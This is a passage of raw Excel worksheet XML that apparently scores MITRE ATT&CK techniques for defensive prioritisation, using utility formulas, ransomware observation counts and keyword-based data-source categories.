        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M216" s="37">
        <v>0</v>
      </c>
      <c r="N216" s="56">
        <v>0</v>
      </c>
      <c r="O216" s="56">
        <v>5</v>
      </c>
      <c r="P216" s="56">
        <v>3</v>
      </c>
      <c r="Q216" s="56">
        <v>1</v>
      </c>
      <c r="R216" s="57" t="s">
        <v>757</v>
      </c>
      <c r="S216" s="57">
        <v>7</v>
      </c>
      <c r="T216" s="57" t="s">
        <v>422</v>
      </c>
      <c r="U216" s="57">
        <v>7</v>
      </c>
      <c r="V216" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.17619023809523809</v>
      </c>
      <c r="W216" s="37">
        <v>14</v>
      </c>
      <c r="X216" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Y216" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Z216" s="37">
        <v>9</v>
      </c>
      <c r="AA216" s="37">
        <v>0.09</v>
      </c>
      <c r="AB216" s="37">
        <v>0.09</v>
      </c>
      <c r="AC216" s="37"/>
      <c r="AD216" s="50" t="s">
        <v>469</v>
      </c>
      <c r="AE216" s="37" t="str" cm="1">
        <f t="array" ref="AE216">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD216)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF216" s="37">
        <v>212</v>
      </c>
      <c r="AG216" s="37" t="str" cm="1">
        <f t="array" ref="AG216">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD216)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH216" s="37">
        <v>212</v>
      </c>
      <c r="AI216" s="37" t="str" cm="1">
        <f t="array" ref="AI216">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD216)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ216" s="37">
        <v>212</v>
      </c>
      <c r="AK216" s="37" t="str" cm="1">
        <f t="array" ref="AK216">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD216)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL216" s="37">
        <v>212</v>
      </c>
      <c r="AM216" s="37" t="str" cm="1">
        <f t="array" ref="AM216">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD216)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN216" s="37">
        <v>0</v>
      </c>
      <c r="AO216" s="37">
        <v>3</v>
      </c>
      <c r="AP216" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="AQ216" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>78.161837380952392</v>
      </c>
      <c r="AR216" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS216" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT216" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU21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5.6544169557823123</v>
      </c>
    </row>
    <row r="217" spans="1:47" ht="34">
      <c r="A217" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B217" s="37">
        <f t="shared" si="3"/>
        <v>207.15693976190477</v>
      </c>
      <c r="C217" s="37" t="s">
        <v>763</v>
      </c>
      <c r="D217" s="50" t="s">
        <v>756</v>
      </c>
      <c r="E217" s="37" t="s">
        <v>764</v>
      </c>
      <c r="F217" s="37">
        <v>1</v>
      </c>
      <c r="G217" s="37">
        <v>1</v>
      </c>
      <c r="H217" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I217" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J217" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K217" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L217" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M217" s="37">
        <v>0</v>
      </c>
      <c r="N217" s="56">
        <v>0</v>
      </c>
      <c r="O217" s="56">
        <v>1</v>
      </c>
      <c r="P217" s="56">
        <v>1</v>
      </c>
      <c r="Q217" s="56">
        <v>0</v>
      </c>
      <c r="R217" s="57" t="s">
        <v>757</v>
      </c>
      <c r="S217" s="57">
        <v>7</v>
      </c>
      <c r="T217" s="57" t="s">
        <v>422</v>
      </c>
      <c r="U217" s="57">
        <v>7</v>
      </c>
      <c r="V217" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.14285690476190477</v>
      </c>
      <c r="W217" s="37">
        <v>14</v>
      </c>
      <c r="X217" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Y217" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Z217" s="37">
        <v>2</v>
      </c>
      <c r="AA217" s="37">
        <v>0.02</v>
      </c>
      <c r="AB217" s="37">
        <v>0.02</v>
      </c>
      <c r="AC217" s="37"/>
      <c r="AD217" s="50" t="s">
        <v>469</v>
      </c>
      <c r="AE217" s="37" t="str" cm="1">
        <f t="array" ref="AE217">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD217)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF217" s="37">
        <v>213</v>
      </c>
      <c r="AG217" s="37" t="str" cm="1">
        <f t="array" ref="AG217">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD217)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH217" s="37">
        <v>213</v>
      </c>
      <c r="AI217" s="37" t="str" cm="1">
        <f t="array" ref="AI217">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD217)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ217" s="37">
        <v>213</v>
      </c>
      <c r="AK217" s="37" t="str" cm="1">
        <f t="array" ref="AK217">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD217)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL217" s="37">
        <v>213</v>
      </c>
      <c r="AM217" s="37" t="str" cm="1">
        <f t="array" ref="AM217">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD217)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN217" s="37">
        <v>0</v>
      </c>
      <c r="AO217" s="37">
        <v>1</v>
      </c>
      <c r="AP217" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ217" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>69.052313253968251</v>
      </c>
      <c r="AR217" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS217" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT217" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU21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1.6679122203325774</v>
      </c>
    </row>
    <row r="218" spans="1:47" ht="34">
      <c r="A218" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B218" s="37">
        <f t="shared" si="3"/>
        <v>102.02380952380953</v>
      </c>
      <c r="C218" s="37" t="s">
        <v>765</v>
      </c>
      <c r="D218" s="50" t="s">
        <v>756</v>
      </c>
      <c r="E218" s="37" t="s">
        <v>766</v>
      </c>
      <c r="F218" s="37">
        <v>1</v>
      </c>
      <c r="G218" s="37">
        <v>1</v>
      </c>
      <c r="H218" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I218" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J218" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K218" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L218" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M218" s="37">
        <v>0</v>
      </c>
      <c r="N218" s="56">
        <v>0</v>
      </c>
      <c r="O218" s="56">
        <v>1</v>
      </c>
      <c r="P218" s="56">
        <v>2</v>
      </c>
      <c r="Q218" s="56">
        <v>1</v>
      </c>
      <c r="R218" s="57"/>
      <c r="S218" s="57">
        <v>0</v>
      </c>
      <c r="T218" s="57"/>
      <c r="U218" s="57">
        <v>0</v>
      </c>
      <c r="V218" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>1.9047619047619046E-2</v>
      </c>
      <c r="W218" s="37">
        <v>0</v>
      </c>
      <c r="X218" s="37">
        <v>0</v>
      </c>
      <c r="Y218" s="37">
        <v>0</v>
      </c>
      <c r="Z218" s="37">
        <v>4</v>
      </c>
      <c r="AA218" s="37">
        <v>0.04</v>
      </c>
      <c r="AB218" s="37">
        <v>0.04</v>
      </c>
      <c r="AC218" s="37"/>
      <c r="AD218" s="50" t="s">
        <v>767</v>
      </c>
      <c r="AE218" s="37" t="str" cm="1">
        <f t="array" ref="AE218">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD218)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF218" s="37">
        <v>214</v>
      </c>
      <c r="AG218" s="37" t="str" cm="1">
        <f t="array" ref="AG218">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD218)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH218" s="37">
        <v>214</v>
      </c>
      <c r="AI218" s="37" t="str" cm="1">
        <f t="array" ref="AI218">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD218)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ218" s="37">
        <v>214</v>
      </c>
      <c r="AK218" s="37" t="str" cm="1">
        <f t="array" ref="AK218">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD218)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL218" s="37">
        <v>214</v>
      </c>
      <c r="AM218" s="37" t="str" cm="1">
        <f t="array" ref="AM218">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD218)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN218" s="37">
        <v>0</v>
      </c>
      <c r="AO218" s="37">
        <v>1</v>
      </c>
      <c r="AP218" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ218" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>34.007936507936513</v>
      </c>
      <c r="AR218" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS218" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT218" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU21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0.83352229780801212</v>
      </c>
    </row>
    <row r="219" spans="1:47" ht="51">
      <c r="A219" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B219" s="37">
        <f t="shared" si="3"/>
        <v>213.19987700000001</v>
      </c>
      <c r="C219" s="37" t="s">
        <v>768</v>
      </c>
      <c r="D219" s="50" t="s">
        <v>756</v>
      </c>
      <c r="E219" s="37" t="s">
        <v>769</v>
      </c>
      <c r="F219" s="37">
        <v>1</v>
      </c>
      <c r="G219" s="37">
        <v>1</v>
      </c>
      <c r="H219" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I219" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J219" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K219" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L219" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M219" s="37">
        <v>0</v>
      </c>
      <c r="N219" s="56">
        <v>0</v>
      </c>
      <c r="O219" s="56">
        <v>1</v>
      </c>
      <c r="P219" s="56">
        <v>0</v>
      </c>
      <c r="Q219" s="56">
        <v>0</v>
      </c>
      <c r="R219" s="57" t="s">
        <v>141</v>
      </c>
      <c r="S219" s="57">
        <v>3</v>
      </c>
      <c r="T219" s="57" t="s">
        <v>770</v>
      </c>
      <c r="U219" s="57">
        <v>12</v>
      </c>
      <c r="V219" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.14761890476190478</v>
      </c>
      <c r="W219" s="37">
        <v>15</v>
      </c>
      <c r="X219" s="37">
        <v>0.272727</v>
      </c>
      <c r="Y219" s="37">
        <v>0.272727</v>
      </c>
      <c r="Z219" s="37">
        <v>1</v>
      </c>
      <c r="AA219" s="37">
        <v>0.01</v>
      </c>
      <c r="AB219" s="37">
        <v>0.01</v>
      </c>
      <c r="AC219" s="37"/>
      <c r="AD219" s="50" t="s">
        <v>771</v>
      </c>
      <c r="AE219" s="37" t="str" cm="1">
        <f t="array" ref="AE219">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD219)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF219" s="37">
        <v>215</v>
      </c>
      <c r="AG219" s="37" t="str" cm="1">
        <f t="array" ref="AG219">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD219)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH219" s="37">
        <v>215</v>
      </c>
      <c r="AI219" s="37" t="str" cm="1">
        <f t="array" ref="AI219">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD219)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ219" s="37">
        <v>215</v>
      </c>
      <c r="AK219" s="37" t="str" cm="1">
        <f t="array" ref="AK219">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD219)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL219" s="37">
        <v>215</v>
      </c>
      <c r="AM219" s="37" t="str" cm="1">
        <f t="array" ref="AM219">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD219)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN219" s="37">
        <v>0</v>
      </c>
      <c r="AO219" s="37">
        <v>1</v>
      </c>
      <c r="AP219" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ219" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>71.066625666666667</v>
      </c>
      <c r="AR219" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS219" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT219" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU21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1.7158720396825398</v>
      </c>
    </row>
    <row r="220" spans="1:47" ht="34">
      <c r="A220" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="B220" s="37">
        <f t="shared" si="3"/>
        <v>179.41220380952379</v>
      </c>
      <c r="C220" s="37" t="s">
        <v>772</v>
      </c>
      <c r="D220" s="50" t="s">
        <v>773</v>
      </c>
      <c r="E220" s="37"/>
      <c r="F220" s="37">
        <v>1</v>
      </c>
      <c r="G220" s="37">
        <v>1</v>
      </c>
      <c r="H220" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I220" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J220" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K220" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L220" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M220" s="37">
        <v>2.6510000000000001E-3</v>
      </c>
      <c r="N220" s="56">
        <v>0</v>
      </c>
      <c r="O220" s="56">
        <v>7</v>
      </c>
      <c r="P220" s="56">
        <v>3</v>
      </c>
      <c r="Q220" s="56">
        <v>0</v>
      </c>
      <c r="R220" s="57" t="s">
        <v>141</v>
      </c>
      <c r="S220" s="57">
        <v>3</v>
      </c>
      <c r="T220" s="57" t="s">
        <v>584</v>
      </c>
      <c r="U220" s="57">
        <v>3</v>
      </c>
      <c r="V220" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.10476195238095237</v>
      </c>
      <c r="W220" s="37">
        <v>6</v>
      </c>
      <c r="X220" s="37">
        <v>0.10909099999999999</v>
      </c>
      <c r="Y220" s="37">
        <v>0.10909099999999999</v>
      </c>
      <c r="Z220" s="37">
        <v>10</v>
      </c>
      <c r="AA220" s="37">
        <v>0.1</v>
      </c>
      <c r="AB220" s="37">
        <v>0.1</v>
      </c>
      <c r="AC220" s="37"/>
      <c r="AD220" s="50" t="s">
        <v>131</v>
      </c>
      <c r="AE220" s="37" t="str" cm="1">
        <f t="array" ref="AE220">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD220)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF220" s="37">
        <v>216</v>
      </c>
      <c r="AG220" s="37" t="str" cm="1">
        <f t="array" ref="AG220">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD220)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH220" s="37">
        <v>216</v>
      </c>
      <c r="AI220" s="37" t="str" cm="1">
        <f t="array" ref="AI220">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD220)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ220" s="37">
        <v>216</v>
      </c>
      <c r="AK220" s="37" t="str" cm="1">
        <f t="array" ref="AK220">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD220)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL220" s="37">
        <v>216</v>
      </c>
      <c r="AM220" s="37" t="str" cm="1">
        <f t="array" ref="AM220">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD220)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN220" s="37">
        <v>0</v>
      </c>
      <c r="AO220" s="37">
        <v>3</v>
      </c>
      <c r="AP220" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="AQ220" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>59.804067936507927</v>
      </c>
      <c r="AR220" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS220" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT220" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU22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4.343147709750566</v>
      </c>
    </row>
    <row r="221" spans="1:47" ht="34">
      <c r="A221" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B221" s="37">
        <f t="shared" si="3"/>
        <v>581.65960495238085</v>
      </c>
      <c r="C221" s="37" t="s">
        <v>774</v>
      </c>
      <c r="D221" s="50" t="s">
        <v>775</v>
      </c>
      <c r="E221" s="37"/>
      <c r="F221" s="37">
        <v>4</v>
      </c>
      <c r="G221" s="37">
        <v>1</v>
      </c>
      <c r="H221" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.25</v>
      </c>
      <c r="I221" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.4</v>
      </c>
      <c r="J221" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="K221" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L221" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M221" s="37">
        <v>2.9599999999999998E-4</v>
      </c>
      <c r="N221" s="56">
        <v>0</v>
      </c>
      <c r="O221" s="56">
        <v>1</v>
      </c>
      <c r="P221" s="56">
        <v>7</v>
      </c>
      <c r="Q221" s="56">
        <v>14</v>
      </c>
      <c r="R221" s="57" t="s">
        <v>776</v>
      </c>
      <c r="S221" s="57">
        <v>18</v>
      </c>
      <c r="T221" s="57" t="s">
        <v>636</v>
      </c>
      <c r="U221" s="57">
        <v>15</v>
      </c>
      <c r="V221" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.419047619047619</v>
      </c>
      <c r="W221" s="37">
